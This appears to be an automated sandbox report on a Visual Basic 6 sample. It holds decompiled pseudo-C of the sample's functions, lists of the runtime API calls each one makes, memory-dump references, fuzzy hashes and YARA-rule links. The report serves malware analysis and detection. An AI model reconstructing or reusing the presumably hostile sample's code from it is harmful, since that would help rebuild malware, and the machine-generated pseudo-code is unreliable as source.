				intOrPtr _v40;
				void* _v44;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v104;
				char _v108;
				intOrPtr* _v140;
				intOrPtr* _v144;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				char _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v192;
				char _v196;
				intOrPtr _v212;
				void* _v280;
				intOrPtr* _v284;
				char _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				char _v320;
				char _v324;
				intOrPtr _t96;
				void* _t102;
				intOrPtr _t103;
				void* _t106;
				char* _t108;
				char* _t110;
				void* _t111;
				intOrPtr* _t113;
				intOrPtr* _t116;
				void* _t120;
				intOrPtr* _t121;
				intOrPtr _t126;
				void* _t129;
				intOrPtr _t136;
				intOrPtr _t142;
				intOrPtr _t153;
				void* _t159;
				intOrPtr _t163;
				intOrPtr* _t169;
				intOrPtr* _t176;
				intOrPtr* _t177;
				intOrPtr* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t183;
				void* _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				void* _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				intOrPtr _t196;
				intOrPtr _t197;

				_t120 = __ebx;
				_t184 = _t190;
				_t191 = _t190 - 0xc;
				 *[fs:0x0] = _t191;
				_t192 = _t191 - 0x14;
				_v16 = _t192;
				_v12 = 0x401468;
				_v8 = 0;
				_t176 = _a4;
				 *((intOrPtr*)( *_t176 + 4))(_t176, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t183);
				_t6 = _t176 + 0x70; // 0x80001
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				E0040F5DC();
				__imp____vbaSetSystemError( *_t6, 0xb0,  &_v28,  &_v32);
				_t126 = _v32 - _v28;
				if(_t126 < 0) {
					__imp____vbaErrorOverflow();
					0;
					_t185 = _t192;
					_t193 = _t192 - 0xc;
					 *[fs:0x0] = _t193;
					_t194 = _t193 - 0x10;
					_v92 = _t194;
					_v88 = 0x401470;
					_v84 = 0;
					_t177 = _v72;
					 *((intOrPtr*)( *_t177 + 4))(_t177, 0, _t176, __ebx,  *[fs:0x0], 0x401d26, _t184);
					_t26 = _t177 + 0x70; // 0x80003
					_v104 = 0;
					_v108 = 0;
					E0040F5DC();
					_t169 = __imp____vbaSetSystemError;
					 *_t169( *_t26, 0xb0,  &_v104,  &_v108);
					_t96 = _v104;
					_t129 = _t96 + _v68;
					_t33 = _t177 + 0x70; // 0x80003
					_t153 =  *_t33;
					if(_t129 < 0) {
						__imp____vbaErrorOverflow();
						_t186 = _t194;
						_t195 = _t194 - 0xc;
						 *[fs:0x0] = _t195;
						_t196 = _t195 - 0x48;
						_v164 = _t196;
						_v160 = 0x401478;
						_v156 = 0;
						_t178 = _v144;
						 *((intOrPtr*)( *_t178 + 4))(_t178, _t169, _t177, __ebx,  *[fs:0x0], 0x401d26, _t185);
						 *_v140 = 0;
						_t46 = _t178 + 0x70; // 0x4180df
						_v176 = 0;
						_v180 = 0;
						_v184 = 0;
						_v192 = 0;
						_v196 = 0;
						_v212 = 0;
						E0040F5DC();
						__imp____vbaSetSystemError( *_t46, 0xb0,  &_v176,  &_v192);
						_t102 =  *((intOrPtr*)( *_t178 + 0x860))(_t178,  &_v196);
						if(_t102 < 0) {
							__imp____vbaHresultCheckObj(_t102, _t178, 0x40f460, 0x860);
						}
						_t179 = __imp____vbaStrMove;
						_v56 = 0;
						_t103 =  *_t179();
						__imp____vbaLenBstr(_v40);
						if(_t103 == 0) {
							L12:
							__imp____vbaStrCopy();
							goto L13;
						} else {
							_t136 = _v52;
							_t103 = _v36;
							_t159 = _t136 - _t103;
							if(_t159 < 0) {
								L15:
								__imp____vbaErrorOverflow();
								_t197 = _t196 - 0xc;
								 *[fs:0x0] = _t197;
								_v304 = _t197 - 0x18;
								_v300 = 0x401488;
								_v296 = 0;
								_t180 = _v284;
								_t106 =  *((intOrPtr*)( *_t180 + 4))(_t180, 0, _t179, _t120,  *[fs:0x0], 0x401d26, _t186);
								_v320 = 0;
								_v324 = 0;
								__imp____vbaStrCopy();
								_t78 = _t180 + 0x70; // 0x80001
								E0040F5DC();
								_t121 = __imp____vbaSetSystemError;
								 *_t121( *_t78, 0xc6, 0, 0);
								_t108 =  &_v324;
								__imp____vbaStrToAnsi(_t108, _v320);
								_t81 = _t180 + 0x70; // 0x80001
								E0040F5DC();
								 *_t121( *_t81, 0xc2, _t106, _t108);
								_t110 =  &_v320;
								__imp____vbaStrToUnicode(_t110, _v324);
								__imp____vbaFreeStr();
								__imp____vbaFreeStr(0x417ad5);
								return _t110;
							} else {
								if(_t159 <= 0) {
									goto L12;
								} else {
									_t163 = _v40;
									_t142 = _t136 - _t103;
									if(_t142 < 0) {
										goto L15;
									} else {
										_v64 = _t142;
										_t111 = _t103 + 1;
										_push( &_v72);
										if(_t111 < 0) {
											goto L15;
										} else {
											_v72 = 3;
											__imp__#631(_t163, _t111);
											_t103 =  *_t179();
											__imp____vbaFreeVar();
											L13:
											__imp____vbaFreeStr(0x4179ed);
											return _t103;
										}
									}
								}
							}
						}
					} else {
						E0040F5DC();
						 *_t169(_t153, 0xb1, _t96, _t129);
						_t113 = _v0;
						 *((intOrPtr*)( *_t113 + 8))(_t113);
						 *[fs:0x0] = _v28;
						return _v12;
					}
				} else {
					_v36 = _t126;
					_t116 = _a4;
					 *((intOrPtr*)( *_t116 + 8))(_t116);
					 *_a8 = _v36;
					 *[fs:0x0] = _v24;
					return _v8;
				}
			}













































































                                                                                0x00417770
                                                                                0x00417771
                                                                                0x00417773
                                                                                0x00417782
                                                                                0x00417789
                                                                                0x0041778f
                                                                                0x00417792
                                                                                0x0041779b
                                                                                0x0041779e
                                                                                0x004177a4
                                                                                0x004177a7
                                                                                0x004177b8
                                                                                0x004177bb
                                                                                0x004177be
                                                                                0x004177c1
                                                                                0x004177c6
                                                                                0x004177d2
                                                                                0x004177d4
                                                                                0x00417800
                                                                                0x0041780c
                                                                                0x00417811
                                                                                0x00417813
                                                                                0x00417822
                                                                                0x00417829
                                                                                0x0041782f
                                                                                0x00417832
                                                                                0x0041783b
                                                                                0x0041783e
                                                                                0x00417844
                                                                                0x00417847
                                                                                0x00417858
                                                                                0x0041785b
                                                                                0x0041785e
                                                                                0x00417863
                                                                                0x00417869
                                                                                0x0041786b
                                                                                0x00417873
                                                                                0x00417875
                                                                                0x00417875
                                                                                0x00417878
                                                                                0x004178a8
                                                                                0x004178b1
                                                                                0x004178b3
                                                                                0x004178c2
                                                                                0x004178c9
                                                                                0x004178cf
                                                                                0x004178d2
                                                                                0x004178db
                                                                                0x004178de
                                                                                0x004178e4
                                                                                0x004178f1
                                                                                0x004178f3
                                                                                0x004178fd
                                                                                0x00417900
                                                                                0x00417903
                                                                                0x00417906
                                                                                0x00417909
                                                                                0x0041790c
                                                                                0x0041790f
                                                                                0x00417914
                                                                                0x00417921
                                                                                0x00417929
                                                                                0x00417937
                                                                                0x00417937
                                                                                0x00417940
                                                                                0x00417949
                                                                                0x0041794c
                                                                                0x00417952
                                                                                0x0041795a
                                                                                0x004179ac
                                                                                0x004179b4
                                                                                0x00000000
                                                                                0x0041795c
                                                                                0x0041795c
                                                                                0x0041795f
                                                                                0x00417964
                                                                                0x00417966
                                                                                0x00417a14
                                                                                0x00417a14
                                                                                0x00417a23
                                                                                0x00417a32
                                                                                0x00417a3f
                                                                                0x00417a42
                                                                                0x00417a4b
                                                                                0x00417a4e
                                                                                0x00417a54
                                                                                0x00417a5d
                                                                                0x00417a60
                                                                                0x00417a63
                                                                                0x00417a69
                                                                                0x00417a74
                                                                                0x00417a79
                                                                                0x00417a81
                                                                                0x00417a86
                                                                                0x00417a8b
                                                                                0x00417a91
                                                                                0x00417a9c
                                                                                0x00417aa1
                                                                                0x00417aa6
                                                                                0x00417aab
                                                                                0x00417ab4
                                                                                0x00417ace
                                                                                0x00417ad4
                                                                                0x0041796c
                                                                                0x0041796e
                                                                                0x00000000
                                                                                0x00417970
                                                                                0x00417970
                                                                                0x00417973
                                                                                0x00417975
                                                                                0x00000000
                                                                                0x0041797b
                                                                                0x0041797b
                                                                                0x00417981
                                                                                0x00417984
                                                                                0x00417985
                                                                                0x00000000
                                                                                0x0041798b
                                                                                0x0041798d
                                                                                0x00417994
                                                                                0x0041799f
                                                                                0x004179a4
                                                                                0x004179ba
                                                                                0x004179e6
                                                                                0x004179ec
                                                                                0x004179ec
                                                                                0x00417985
                                                                                0x00417975
                                                                                0x0041796e
                                                                                0x00417966
                                                                                0x0041787a
                                                                                0x00417882
                                                                                0x00417887
                                                                                0x00417889
                                                                                0x0041788f
                                                                                0x0041789a
                                                                                0x004178a5
                                                                                0x004178a5
                                                                                0x004177d6
                                                                                0x004177d6
                                                                                0x004177d9
                                                                                0x004177df
                                                                                0x004177e8
                                                                                0x004177f2
                                                                                0x004177fd
                                                                                0x004177fd

                                                                                APIs
                                                                                • __vbaSetSystemError.MSVBVM60(00080001,000000B0,?,?,?,?,?,?,?,?,?,00401D26), ref: 004177C6
                                                                                • __vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,?,00401D26), ref: 00417800
                                                                                • __vbaSetSystemError.MSVBVM60(00080003,000000B0,?,?), ref: 00417869
                                                                                • __vbaSetSystemError.MSVBVM60(00080003,000000B1,?,?), ref: 00417887
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: Error__vba$System$Overflow
                                                                                • String ID:
                                                                                • API String ID: 868049110-0
                                                                                • Opcode ID: b4208f3309b515724842a22f0efa278b354388a228e95db4bbe2ddab71d78020
                                                                                • Instruction ID: ef7cf49ab0a65f07306b2dc3c61cb2db9c88e639ada1fd06a3bad6ff06cd6ac4
                                                                                • Opcode Fuzzy Hash: b4208f3309b515724842a22f0efa278b354388a228e95db4bbe2ddab71d78020
                                                                                • Instruction Fuzzy Hash: 61A13E75D00209AFDB14DFA9D945AEEFBB8FF88700F10802AE915B3660D778A945CF64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041D030, Relevance: 30.2, APIs: 20, Instructions: 216COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D0B5
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000000D8), ref: 0041D0DC
                                                                                • __vbaVarForInit.MSVBVM60(?,?,?,?,?,00000002), ref: 0041D120
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041D12B
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D147
                                                                                • __vbaI2Var.MSVBVM60(?,?), ref: 0041D159
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,00000138), ref: 0041D17B
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041D187
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041D1A0
                                                                                • __vbaI2Var.MSVBVM60(?,?), ref: 0041D1B2
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000000E8), ref: 0041D1D4
                                                                                • __vbaFreeObj.MSVBVM60(00401760,?), ref: 0041D1FA
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041D203
                                                                                • __vbaVarForNext.MSVBVM60(?,?,?), ref: 0041D21B
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,0041D27A), ref: 0041D267
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041D273
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$CheckHresult$InitListNext
                                                                                • String ID:
                                                                                • API String ID: 3182110704-0
                                                                                • Opcode ID: e7e8942c6e4d492981a24d2389e3e02bb8081b39ec8293a625fea194fc897eae
                                                                                • Instruction ID: 6a85e27ae920267f53d5d76ba3e1e7c53119c4ca6f97be34d9284739ec19b9b4
                                                                                • Opcode Fuzzy Hash: e7e8942c6e4d492981a24d2389e3e02bb8081b39ec8293a625fea194fc897eae
                                                                                • Instruction Fuzzy Hash: 848109B1D00209EFCB10DFA5D988ADEBBB8FF48701F10856AE546B7250DB345A89CF64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041C8E0, Relevance: 30.2, APIs: 20, Instructions: 162COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • #593.MSVBVM60(?), ref: 0041C95D
                                                                                • __vbaFPInt.MSVBVM60 ref: 0041C973
                                                                                • __vbaVarMove.MSVBVM60 ref: 0041C98F
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041C998
                                                                                • __vbaStrCopy.MSVBVM60 ref: 0041C9A6
                                                                                • __vbaVarForInit.MSVBVM60(?,?,?,00000004,?,?), ref: 0041C9E5
                                                                                • #593.MSVBVM60(0000000A), ref: 0041CA21
                                                                                • __vbaFPInt.MSVBVM60 ref: 0041CA37
                                                                                • __vbaFpI4.MSVBVM60 ref: 0041CA4D
                                                                                • #608.MSVBVM60(?,00000000), ref: 0041CA58
                                                                                • __vbaVarCat.MSVBVM60(?,?,00000008), ref: 0041CA6D
                                                                                • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041CA74
                                                                                • __vbaStrMove.MSVBVM60 ref: 0041CA7B
                                                                                • __vbaFreeVarList.MSVBVM60(00000003,0000000A,?,?), ref: 0041CA8B
                                                                                • __vbaVarForNext.MSVBVM60(?,?,?), ref: 0041CAA6
                                                                                • __vbaFreeVar.MSVBVM60(0000000A,00401700,?), ref: 0041CAD5
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,0041CB3A), ref: 0041CB17
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041CB29
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0041CB2E
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041CB37
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$Move$#593List$#608CopyInitNext
                                                                                • String ID:
                                                                                • API String ID: 4148204782-0
                                                                                • Opcode ID: e0988d56768810e98dd338c59231a28b6df2efc98b64c1d13d84d6347c178d24
                                                                                • Instruction ID: 5f35ebb9a6637d0c404a355b193f0a4585f7776cb073dbf18c79494bb6df7b5d
                                                                                • Opcode Fuzzy Hash: e0988d56768810e98dd338c59231a28b6df2efc98b64c1d13d84d6347c178d24
                                                                                • Instruction Fuzzy Hash: 7E613BB1800219DFDB10DF94DD84ADDBB78FF48704F14816AE549B7260DB746A8ACFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004241F0, Relevance: 28.6, APIs: 19, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60(00000001,00000000,72A26C30), ref: 0042423F
                                                                                • __vbaStrCopy.MSVBVM60 ref: 00424247
                                                                                • __vbaStrCat.MSVBVM60(00411B14,?,?,00000001), ref: 00424258
                                                                                • __vbaStrMove.MSVBVM60 ref: 00424269
                                                                                • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0042426D
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0042427B
                                                                                • __vbaLenBstr.MSVBVM60(?), ref: 0042428D
                                                                                • #631.MSVBVM60(?,-00000002,?,00000001), ref: 004242C2
                                                                                • __vbaStrMove.MSVBVM60 ref: 004242CD
                                                                                • #537.MSVBVM60(00000022,00000000), ref: 004242D2
                                                                                • __vbaStrMove.MSVBVM60 ref: 004242DD
                                                                                • __vbaInStr.MSVBVM60(00000000,00000000), ref: 004242E1
                                                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004242FD
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00424309
                                                                                • #631.MSVBVM60(?,-00000002,?), ref: 0042432A
                                                                                • __vbaStrMove.MSVBVM60 ref: 00424335
                                                                                • __vbaFreeStr.MSVBVM60(0042437B), ref: 00424373
                                                                                • __vbaFreeStr.MSVBVM60 ref: 00424378
                                                                                • __vbaErrorOverflow.MSVBVM60 ref: 00424391
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$Move$#631Copy$#537BstrErrorListOverflow
                                                                                • String ID:
                                                                                • API String ID: 2145999145-0
                                                                                • Opcode ID: 869c94eff4719d3445c7680111563ec1679fe1b2f49b43f7d9d87f13be040cf3
                                                                                • Instruction ID: 7b8e4d17f200f24905ac9b7e6a1c082584fd9c0793d708d482427f1cd895d236
                                                                                • Opcode Fuzzy Hash: 869c94eff4719d3445c7680111563ec1679fe1b2f49b43f7d9d87f13be040cf3
                                                                                • Instruction Fuzzy Hash: 69411DB5D00259EFCB14DFA4ED859EEBBB8FB48300F50412AE905B7260DB745945CFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00426790, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004267FE
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0258F774,004104C8,00000014), ref: 00426823
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104E8,00000050), ref: 00426847
                                                                                • __vbaStrCat.MSVBVM60(\Sounds\Click.wav,?,00000000,00000001), ref: 00426859
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00426864
                                                                                • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0042686F
                                                                                • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0042687B
                                                                                • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0042688F
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0042689B
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004268B5
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412014,0000005C), ref: 004268D0
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004268D9
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004268ED
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412014,0000005C), ref: 00426908
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00426911
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$AnsiErrorListMoveNew2System
                                                                                • String ID: \Sounds\Click.wav
                                                                                • API String ID: 2740840597-1585840535
                                                                                • Opcode ID: f857b64f014cd668101273eff1111e7c3b7434942030b36ba6878eb5fcc1e8fe
                                                                                • Instruction ID: 2cc060864ead10da6dbf65f829a6bb4656d60626cb2d236470b8b610472c64ed
                                                                                • Opcode Fuzzy Hash: f857b64f014cd668101273eff1111e7c3b7434942030b36ba6878eb5fcc1e8fe
                                                                                • Instruction Fuzzy Hash: BB415571A00215AFDB109FA4DE89EEE7BB8FF09705F204169F601F71A0D7785945CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041DE40, Relevance: 27.1, APIs: 18, Instructions: 148COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(0040B730,?,00000000,?,72A1A274), ref: 0041DE8C
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,0000001C), ref: 0041DEB0
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041DEB9
                                                                                • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DED2
                                                                                • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DEE6
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,72A1A237,00411158,00000020), ref: 0041DF09
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041DF12
                                                                                • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DF22
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,72A1A237,00411158,00000024), ref: 0041DF43
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041DF4E
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041DF57
                                                                                • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DF6A
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DF8B
                                                                                • __vbaVarTextTstEq.MSVBVM60(?,?), ref: 0041DF9C
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041DFA7
                                                                                • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DFBC
                                                                                • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 0041DFC9
                                                                                • __vbaFreeObj.MSVBVM60(0041E00C), ref: 0041E005
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$New2$Free$CheckHresult$Addref$Text
                                                                                • String ID:
                                                                                • API String ID: 2851631601-0
                                                                                • Opcode ID: 3f32f0f8c3371e7541b1ce9ea75cff5f4fb04cdc1715be45626221a2d6cc9bca
                                                                                • Instruction ID: 5e1d30c90b861ca7848139087fe7dc1a9eb11ad966b48f2339337a312027fb64
                                                                                • Opcode Fuzzy Hash: 3f32f0f8c3371e7541b1ce9ea75cff5f4fb04cdc1715be45626221a2d6cc9bca
                                                                                • Instruction Fuzzy Hash: 965163B0900249AFCB14DF95DD89DDEBB78FF58705B208429F641B72A0D7749889CFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004183D0, Relevance: 25.7, APIs: 17, Instructions: 159COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaVarMove.MSVBVM60 ref: 0041841C
                                                                                • #525.MSVBVM60(-00007FFE), ref: 00418453
                                                                                • __vbaStrMove.MSVBVM60 ref: 0041845E
                                                                                • __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041846C
                                                                                • __vbaSetSystemError.MSVBVM60(0041889E,0000000D,-00007FFE,00000000), ref: 00418481
                                                                                • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041848F
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0041849E
                                                                                • __vbaStrCopy.MSVBVM60 ref: 004184AA
                                                                                • __vbaFreeVar.MSVBVM60(004184E3), ref: 004184D3
                                                                                • __vbaFreeStr.MSVBVM60 ref: 004184DC
                                                                                • __vbaErrorOverflow.MSVBVM60 ref: 00418500
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401528,0040F430,000002B0), ref: 00418577
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410678,0000003C), ref: 0041859B
                                                                                • __vbaFreeObj.MSVBVM60 ref: 004185A7
                                                                                • __vbaStrCopy.MSVBVM60 ref: 004185C5
                                                                                • __vbaFreeStr.MSVBVM60 ref: 004185CE
                                                                                • __vbaStrCopy.MSVBVM60 ref: 004185DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$Copy$CheckErrorHresultMove$#525AnsiOverflowSystemUnicode
                                                                                • String ID:
                                                                                • API String ID: 727747846-0
                                                                                • Opcode ID: 657152c05121c586db5327124a442754050677307aae7951800f8b752932e4e9
                                                                                • Instruction ID: f487ac9f09a99370c070d56df0fb01880138e9f754481dcb7e66e7c1ad1910b5
                                                                                • Opcode Fuzzy Hash: 657152c05121c586db5327124a442754050677307aae7951800f8b752932e4e9
                                                                                • Instruction Fuzzy Hash: EA518375900219EFCB14DFA4DA88AEEBBB8FF08700F104529F506B7260DB786946CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004152F0, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 00415347
                                                                                • __vbaObjIs.MSVBVM60(?,00000000), ref: 0041534E
                                                                                • __vbaCastObj.MSVBVM60(?,00410468), ref: 0041536B
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00415376
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410468,0000004C), ref: 0041539B
                                                                                • __vbaSetSystemError.MSVBVM60(00080007,00000030,?,00000001), ref: 004153B2
